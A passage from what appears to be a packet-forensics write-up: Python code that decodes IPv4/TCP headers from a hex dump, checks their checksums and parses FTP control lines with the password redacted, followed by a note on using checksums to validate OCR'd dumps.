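    """Decode IPv4 and TCP headers of a raw packet and return the fields as a dict."""
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _hcs, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    if proto != 6:
        raise ValueError("not TCP")
    if len(pkt) < total_len:
        raise ValueError("truncated packet")
    tcp = pkt[ihl:total_len]                         # drop any trailing link-layer padding
    sport, dport, seq, ack, off_flags, win, _tcs, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    doff = (off_flags >> 12) * 4
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(tcp))   # TCP pseudo-header
    return {
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)), "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "win": win,
        "flags": [name for bit, name in TCP_FLAGS if off_flags & bit],
        "ip_checksum_ok": inet_checksum(pkt[:ihl]) == 0,
        "tcp_checksum_ok": inet_checksum(pseudo + tcp) == 0,
        "payload": tcp[doff:],
    }


def ftp_command(payload, redact=True):
    """Split one FTP control-channel line into (verb, argument). The PASS argument is
    redacted by default so that decoded evidence does not reproduce the credential."""
    line = payload.decode("ascii", "replace").rstrip("\r\n ")
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    if redact and verb == "PASS" and arg:
        arg = "<redacted>"
    return verb, arg


if __name__ == "__main__":
    info = decode_ipv4_tcp(hexdump_to_bytes(SAMPLE_DUMP))
    print(f"{info['src']}:{info['sport']} -> {info['dst']}:{info['dport']} {info['flags']} "
          f"ip_ok={info['ip_checksum_ok']} tcp_ok={info['tcp_checksum_ok']} {ftp_command(info['payload'])}")
```

The checksum checks double as an OCR sanity test for dumps like the one above: a single misread hex digit in a header makes the corresponding checksum fail, which is how a corrected transcription can be validated before it is relied on as evidence.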